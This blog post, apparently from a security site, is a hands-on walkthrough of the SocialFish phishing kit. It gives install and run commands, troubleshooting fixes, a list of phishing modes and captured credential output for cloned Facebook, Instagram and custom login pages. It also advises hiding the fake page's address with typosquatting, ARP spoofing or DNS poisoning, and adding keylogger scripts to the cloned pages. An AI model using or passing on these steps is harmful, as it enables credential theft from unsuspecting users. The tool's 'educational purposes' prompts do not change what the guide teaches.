SocialFish Phishing Examples v2 & v3 [FB, Instagram, Custom]

CyberPunk MITM
SocialFish Phishing Examples v2 & v3 [FB, Instagram, Custom]

SocialFish might be a bit difficult to locate, if you’re looking a specific version and/or if you’re a newbie. Apparently there are a number of forks, including transition of some sort, moving, merging or converting SocialFish to HiddenEye.

Compared to Evilginx for instance, SocialFish is inferior, but having in mind the ease of use, its “popularity” is maybe understandable. Nonetheless, we’re going to quickly go through a SocialFish usage (out of the box).

SocialFish v2.0 SharkNet

We’re going to use an old version of SocialFish – SharkNet v2 (UndeadSec). There are probably other forks floating around, one supporting more options than the others, but they’re basically all the same.

                      '
                     '   '  UNDEADSEC | t.me/UndeadSec
                    '       '  youtube.com/c/UndeadSec - BRAZIL
              .  '  .        '                        '
          '             '      '                   '   '
   ███████ ████████ ███████ ██ ███████ ██       ███████ ██ ███████ ██   ██ 
   ██      ██    ██ ██      ██ ██   ██ ██       ██      ██ ██      ██   ██ 
   ███████ ██    ██ ██      ██ ███████ ██       █████   ██ ███████ ███████ 
        ██ ██    ██ ██      ██ ██   ██ ██       ██      ██      ██ ██   ██ 
   ███████ ████████ ███████ ██ ██   ██ ███████  ██      ██ ███████ ██   ██ 
       .    '   '….'               ..'.      ' .
          '  .                     .     '          '     '  v2.0sharkNet 
                '  .  .  .  .  . '.    .'              '  .
                    '         '    '. '      Twitter: https://twitter.com/A1S0N_
                      '       '      '             
                        ' .  '
 [!] Do you agree to use this tool for educational purposes only? [y/N] >

On start there are a couple of options: [S]ocial Media & [O]thers

Social Media:

  • Facebook
  • Google
  • Instagram
  • Github
  • FbRobotCaptcha
  • VK
  • LinkedIn
  • Snapchat
  • Twitter

Others:

  • StackOverflow
  • WordPress
  • Steam

They all work the same, select the redirect url and you’re ready. Plug & Play. SocialFish is setting the thing up and NGrok is there to tunnel the request and expose your server to the public internet. Easy.

SocialFish v2.0 vs Facebook

Run it:

python3 ./SocialFish.py
[!] Do you agree to use this tool for educational purposes only? [y/N] > y
[!] Do you want to receive credentials by email? [y/N] > n
  Select an option
   [S]ocial Media
   [O]thers
SF > s
 [1] LinkedIn
 [2] Twitter
 [3] Instagram
 [4] Snapchat
 [5] Github
 [6] Google
 [7] VK
 [8] Facebook
 [9] FbRobotCaptcha
 SF > 8
Insert a custom redirect url: > http//localhost/
     .-=-.     .-,     THIS IS NOT A JOKE!
  .'       "-.,' /  MISUSE OF THIS TOOL RESULTS 
 (          .  <          IN CRIME!
  =.____.=".\  AND THE RESPONSIBILITY IS
                          ONLY YOURS.

 [] facebook module loaded. Building site…  [~] Ready to Phishing  [] Ngrok URL: https://2608a973.ngrok.io
  [~] Your logs are being stored in: Logs/facebook-200130.txt
  [^] Press Ctrl+C or VolDown+C(android) to quit
  [*] Waiting for credentials…

and we’re running.. If we now open that link (https://2608a973.ngrok.io), we would see a FB login page.

SocialFish v2.0 vs Facebook
SocialFish v2.0 vs Facebook – Login Page

Of course this is the old version, probably not up-to-date so the files are missing and frontend is messed up. You could probably update that page manually or create a new page of your own (./base/WebPages/facebook/). 

 drwxrwxr-x  2 unknown unknown   4096 јан 30 18:51 .
 drwxrwxr-x 14 unknown unknown   4096 нов  8  2018 ..
 -rw-rw-r--  1 unknown unknown 536440 нов  8  2018 index.html
 -rw-rw-r--  1 unknown unknown    989 нов  8  2018 login.php
 -rw-rw-r--  1 unknown unknown   9588 нов  8  2018 mobile.html
 -rw-rw-r--  1 unknown unknown     92 нов  8  2018 protect.html

If we exclude the frontend issue for now and continue, inserting the credentials (cyberpunk/theone), server side (output & log) would end up with:

[*] Credentials found:
   : cyberpunk
   : theone
   : 38.133.55.238 
  : Toronto
   : Canada

redirecting the user to the previously set http//localhost/. Localhost was set just as an example, you should probably set the default login of a service. You’re most likely getting the picture by now. SocialFish basically hides behind the “failed” user login attempt, redirecting him to a real login page right away. The unsuspecting user would most likely think he simply made a mistake typing the password, unknowingly giving his credentials to an attacker.

Ok, visiting a domain https://2608a973.ngrok.io will most likely be suspicious and noticed by users, but add typosquatting to the mix (misspeling, different charset, top-level domain, etc.), or altering ARP table, DNS poisoning and the chance of a success is even greater. Difference between wikipedia.org and wikiepdia.org or google and g00gle. How often are you checking the url?

SocialFish v2.0 vs Instagram

Out of the box, Instagram looks better, outdated but complete.

SocialFish v2.0 vs Instagram
SocialFish v2.0 – out of the box (2018)

Same behaviour, insert the credentials and server catches them on the other side, redirecting you to the pre-defined url.

With NGrok (SocialFish + NGrok), mind your steps. There might be a situation in which ngrok is left running in the backend. You need to restart the service or register in order to use it or service ends up timing out.

SocialFish v2.0 vs Instagram: Tunnel Expired
Ngrok Tunnel Expired

SocialFish v3.0 Neptune

Apparently there are different variants of the same SocialFish version supporting different things. Yes, crazy s***. Everyone has its own ideas on how should this work. For instance, An0nD4Y’s v3 is still in terminal, while UndeadSec’s uses GUI by default.

SocialFish v3.0 Neptune [An0nUD4Y]

Running An0nUD4Y’s SocialFish version lead me to many problems like not being able to run Serveo or default port 1111 not working for some reason.

SocialFish v3.0 Neptune [An0nUD4Y]
Client Failed to establish a connection to the local address – port 1111

It might be due to our testing system, but nonetheless, someone might encounter similar issue. Try and edit the default/hardcoded port to something else (e.g. 8080). Another issue is that “runServer” function is not reached, so replace the order of lines (quick fix):

server()
multiprocessing.Process(target=runServer).start()

to

multiprocessing.Process(target=runServer).start()
server()

NGrok panel is available on: http://localhost:4040/inspect/http

Looking at the files: 

 drwxrwxr-x 2 unknown unknown 4,0K феб  4 14:27 index_files
 -rw-rw-r-- 1 unknown unknown 131K феб  3 22:58 index.html
 -rw-rw-r-- 1 unknown unknown  711 феб  4 14:39 ip.php
 -rw-rw-r-- 1 unknown unknown  180 феб  4 14:42 ip.txt
 -rw-rw-r-- 1 unknown unknown  379 феб  4 14:39 KeyloggerData.txt
 -rw-rw-r-- 1 unknown unknown  292 феб  4 14:39 keylogger.js
 -rw-rw-r-- 1 unknown unknown  172 феб  4 14:39 keylogger.php
 -rw-rw-r-- 1 unknown unknown  192 феб  4 14:39 login.php
 -rw-rw-r-- 1 unknown unknown   27 феб  4 14:42 usernames.txt

Keylogger is present, but it’s not included everywhere. Looking at the code, it seems that only GitHub has it, so if you want to capture keys, you must include the script yourself.

<script src="keylogger.js"></script>
<script src="keylogger.php"></script>

This version of neptune definitely includes a number of options (transitioned to HiddenEye):

[1] Facebook
    Operation mode:
        [1] Standard Page Phishing
        [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
        [3] Facebook Phishing- Fake Security issue(security_mode) 
        [4] Facebook Phising-Messenger Credentials(messenger_mode)

[2] Google
    Operation mode: 
        [1] Standard Page Phishing
        [2] Advanced Phishing(poll_mode/login_with)
        [3] New Google Web

[3] LinkedIn
[4] GitHub
[5] StackOverflow
[6] WordPress
[7] Twitter

[8] Instagram
    Operation mode:  
        [1] Standard Instagram Web Page Phishing
        [2] Instagram Autoliker Phising (After submit redirects to original autoliker)

[9] Snapchat
[10] Yahoo
[11] Twitch
[12] Microsoft
[13] Steam

[14] VK
    Operation mode:  
        [1] Standard VK Web Page Phishing
        [2] Advanced Phishing(poll_mode/login_with)

[15] iCloud 

* Modules 3, 4, 5, 6, 7, 9, 10, 11, 12 and 13 are being directly loaded without operation mode (Traditional/Standard logins)

SocialFish v3.0 vs Facebook [An0nUD4Y]

Well, selection => Facebook => Standard Web Page Phishing

SocialFish v3.0 vs Facebook [An0nUD4Y]
SocialFish v3 Facebook Phishing – Error rendering

It doesn’t look great, that’s for sure, but we’re not going to go into details here, we’re testing things as is, out of the box. This definitely looks similar to SocialFish v2 (NetShark), but the main logo says it’s v3.0. More over, the instagram result below is the same.

SocialFish v3.0 vs Instagram[An0nUD4Y]

It clearly states 2018, so some segments of An0nUD4Y were updated, but others were not.

SocialFish v3 Instagram Phishing - Old layout
SocialFish v3 Instagram Phishing – Old layout

SocialFish v3.0 Neptune [UndeadSec]

We used te UndeadSec’s SocialFish (Neptune v3). The install process is straightforward, you can find it in a repository info or wiki. Main prerequisites: > python3.6, pip3

$ sudo apt-get install python3 python3-pip python3-dev -y
$ git clone https://github.com/UndeadSec/SocialFish.git
$ cd SocialFish
$ python3 -m pip install -r requirements.txt
$ python3 ./SocialFish.py cyberpunk theone
SocialFish v3.0 Neptune [UndeadSec]
UndeadSec – SocialFish v3.0 Neptune

Neptune offers web interface on http://0.0.0.0:5000/. Initially you’ll be presented with an empty page:

SocialFish v3 Neptune Web Interface
SocialFish v3 Neptune Web Interface

Opening a http://0.0.0.0:5000/neptune, you’ll end up with a login (you used on SocialFish start).

SocialFish v3 Neptune Web Interface (/neptune)
SocialFish v3 Neptune Web Interface (/neptune)

Login and you’ll end up with a “dashboard:

SocialFish v3 Neptune Web Interface (/creds, dashboard uppon login)
SocialFish v3 Neptune Web Interface (/creds, dashboard uppon login)

One thing that puzzles us is a “SECRET KEY” option. Quick look at the codebase and it seems like it’s not used anywhere:

$ grep -i "APP_SECRET" ./* -R
 ./core/config.py:APP_SECRET_KEY = ''
 ./SocialFish.py:app.secret_key = APP_SECRET_KEY

Probably some future funcionality. Apparently, there’s no KeyLogger option here.

SocialFish v3.0 (Neptune) vs Facebook

Similar to previous version, fill in the fields in the top right corner (clone/redirection) and add the link you want to clone and to where redirection should take a user:

Clone: https://www.instagram.com/accounts/login/?source=auth_switcher
Redirect: https://www.instagram.com/accounts/login/?source=auth_switcher

SocialFish v3 dashboard Fields
SocialFish v3 dashboard Fields

Hit that small power sign to start it up (a pop up with “success” message should jump out). The “Method not allowed” or “CORS” issues might cause some problems. Important part, if you try and use “facebook.com” you might end up with an uncomplete page (missing the labels, text, etc).

SocialFish v3 Facebook Phishing - Bad rendering
SocialFish v3 Facebook Phishing – Bad rendering

Instead, try direct English url or “en-gb.facebook.com”:

SocialFish v3 Facebook Phishing - Correct rendering
SocialFish v3 Facebook Phishing – Correct rendering

Behavious is the same, user enters the credentials (SocialFish picks up) and gets redirected to previously specified page. The dashboard tracks the clicks (visits), how many visitors didin’t take the bait, captured credentials and attacks launched.

SocialFish v3 Dashboard
SocialFish v3 Dashboard

Click on the view would show you the details of what’s captured:

{'jazoest': '2632', 'lsd': 'AVqCEN6a', 'email': 'cyberpunk', 'pass': 'theone', 'timezone': '-60', 'lgndim': 'eyJ3IjoxOTIwLCJoIjoxMDgwCCJhdyI6MTDyMCwAYWgiOjEwODAsImMiOjI1fQ==', 'lgnrnd': '065021_ZrKc', 'lgnjs': '1580568629', 'ab_test_data': 'KAVA/fffqAVAVVKAAKAKAVAAKAAAAKKAAAAAAAAAAGs//ZlSAAGRAAH', 'locale': 'en_GB', 'next': 'https://en-gb.facebook.com/', 'login_source': 'login_bluebar', 'guid': 'f47db913b42a344', 'prefill_contact_point': '', 'prefill_source': '', 'prefill_type': '', 'skstamp': 'eyJoYXNoIjoiZmRkNAY5NjdkOGM1ODQzYzhmMmM2NzczZTVhMWFjMTIiLCJoYXNoMiI6ImY4NzBiMzRhYzAyZmFmYmZjMWU5YjIyNWI3ZGQ3YWI4Iiwicz91bmRzIjo1LCJzZWVkIjsiNjQ0ZmM1MzNmYTM2Y2NyOGQ0MTlkZDNjMGI2NTBhMDEiLCJzZWVkMiI6IjRjMzEaMzIxYWM1YjA2Y2RhZDdiN2ZjMTJiNDg0M2VkIiwidTltZV91YWtlbiI6OTIxNCwic3VyZnFjZSI6ImxvZ2luIn0='}

SocialFish v3.0 (Neptune) vs Instagram

Unfortunatelly, trying this on the Instagram login ended up with a fail. CORS or bad clone, not sure.

SocialFish v3 Instagram Phishing - Error
SocialFish v3 Instagram Phishing – Error

Custom

Using SocialFish seems to have certain prerequisites, like login page/form having a “email” & “password” fields. We didn’t explore additional options, but if you have a “login name” (not an email) & “password” on a custom/random login page you’re trying to fish, you’ll need to adjust the SocialFish.py. Again, we didn’t explore additional options & ways to circumvent this. On our test page:

And the captured result:

{'email': 'cyberpunk', 'password': 'theone', 'login': ''}

The button had a “name=login” , so the field probably got picked up as well (an empty value).

Conclusion

Well, that was an experience, trying to fix something that should work on its own, but you get used to things not working out. There’s no documentation when it comes to SocialFish (or not a detailed one at least), and although it’s maybe “intuitive” for some experienced users, for newbie users all this might be a complete unknown. We didn’t cover page/template update and/or custom page builds, but based on a cloning option in v3, that probably isn’t necessary.

Next, since this project moved to HiddenEye, we’re going to check that one as well.

FYI: SocialFish Mobile Controller: SocialFishMobile (UndeadSec)

linuxMITM AttackPhishingPhishing Tools